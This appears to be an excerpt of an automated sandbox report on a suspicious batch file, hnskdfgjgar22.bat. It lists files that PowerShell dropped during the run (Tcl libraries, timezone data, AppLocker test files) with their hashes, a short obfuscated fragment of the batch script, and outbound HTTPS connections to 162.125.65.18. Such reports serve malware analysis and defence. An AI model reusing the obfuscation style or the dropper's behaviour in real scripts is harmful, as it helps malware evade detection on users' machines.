                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                              MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                              SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                              SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                              SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                              MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                              SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                              SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                              SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11707
                                                                                                                                                                                                                              Entropy (8bit):5.03328629946697
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zy7go:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Urk
                                                                                                                                                                                                                              MD5:A0B269D76DB613C2D927EFA84FEE88E2
                                                                                                                                                                                                                              SHA1:F9C7AD375F4D4223F0668FA1E2C4E5A83CAC2D03
                                                                                                                                                                                                                              SHA-256:32348D51F3637F375B056FE99E9B4D89D85D45DB907847DC370BD72812A2E2FE
                                                                                                                                                                                                                              SHA-512:5427762147825DC2ED3FEEE4011BBF2100932A4D93F3242CCAD15499C9DC39F42A82AEB42ED5DB5839560CD7AAE5D30621AC3694552FFC650A1F572CEE32FA54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6218
                                                                                                                                                                                                                              Entropy (8bit):4.843141834641668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                                                                                                              MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                                                                                                              SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                                                                                                              SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                                                                                                              SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35136
                                                                                                                                                                                                                              Entropy (8bit):4.945501767273492
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                                                                                                              MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                                                                                                              SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                                                                                                              SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                                                                                                              SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):107674
                                                                                                                                                                                                                              Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                              MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                              SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                              SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                              SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118419
                                                                                                                                                                                                                              Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                              MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                              SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                              SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                              SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9434
                                                                                                                                                                                                                              Entropy (8bit):4.928515784730612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                                                              MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                                                              SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                                                              SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                                                              SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):14
                                                                                                                                                                                                                              Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                              MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                              SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                              SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                              SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:ECHO is off...
                                                                                                                                                                                                                              Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36
                                                                                                                                                                                                                              Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                              MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                              SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                              SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                              SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                                              File type:Non-ISO extended-ASCII text, with very long lines (1424), with LF, NEL line terminators, with escape sequences
                                                                                                                                                                                                                              Entropy (8bit):5.517350382001376
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                                              • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                                              File name:hnskdfgjgar22.bat
                                                                                                                                                                                                                              File size:33'740 bytes
                                                                                                                                                                                                                              MD5:ed0e925d4c24330ba19fadc0fa66c439
                                                                                                                                                                                                                              SHA1:cf2e90032cb7f47df5c7a2104260b167cb61288a
                                                                                                                                                                                                                              SHA256:d612e6d64d2b598b2c0db5434d946f0f02237eb0bf80eaa8801c59f2519769c8
                                                                                                                                                                                                                              SHA512:1d178de5bc611ce91a3c03ef79a5a270521d3d91fd7b244eb3a9fe195711b2cdb7d1ad063ef964bbe30536c845e220700886770e1b1c242b60e7066364f20bef
                                                                                                                                                                                                                              SSDEEP:768:Kt2PiS12tzLd4uBaJQ1J35906E+n2LYug8n:0VDG6Sr
                                                                                                                                                                                                                              TLSH:26E2B79407967EDA10E74A35E75A3023ECCEB53E21BC283F963934DE1AB3568C612573
                                                                                                                                                                                                                              File Content Preview:....>nul 2>&1 &cls.;@e%...^..............%%..................^%^%................^%cho o%(........)(........)(.........)...(......_...)...^(........)(........)%f%...(......_...)......(......_...)...(........)...( ..._...)...(.....^...)...(......_...)...%^
                                                                                                                                                                                                                              Icon Hash:9686878b929a9886
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.503768921 CET49730443192.168.2.4162.125.65.18
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.503803968 CET44349730162.125.65.18192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.503875017 CET49730443192.168.2.4162.125.65.18
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.511683941 CET49730443192.168.2.4162.125.65.18
                                                                                                                                                                                                                              Dec 24, 2024 07:31:02.511691093 CET44349730162.125.65.18192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:03.878000021 CET44349730162.125.65.18192.168.2.4
                                                                                                                                                                                                                              Dec 24, 2024 07:31:03.878098965 CET49730443192.168.2.4162.125.65.18
                                                                                                                                                                                                                              Dec 24, 2024 07:31:03.881278992 CET49730443192.168.2.4162.125.65.18
                                                                                                                                                                                                                              Dec 24, 2024 07:31:03.881287098 CET44349730162.125.65.18192.168.2.4
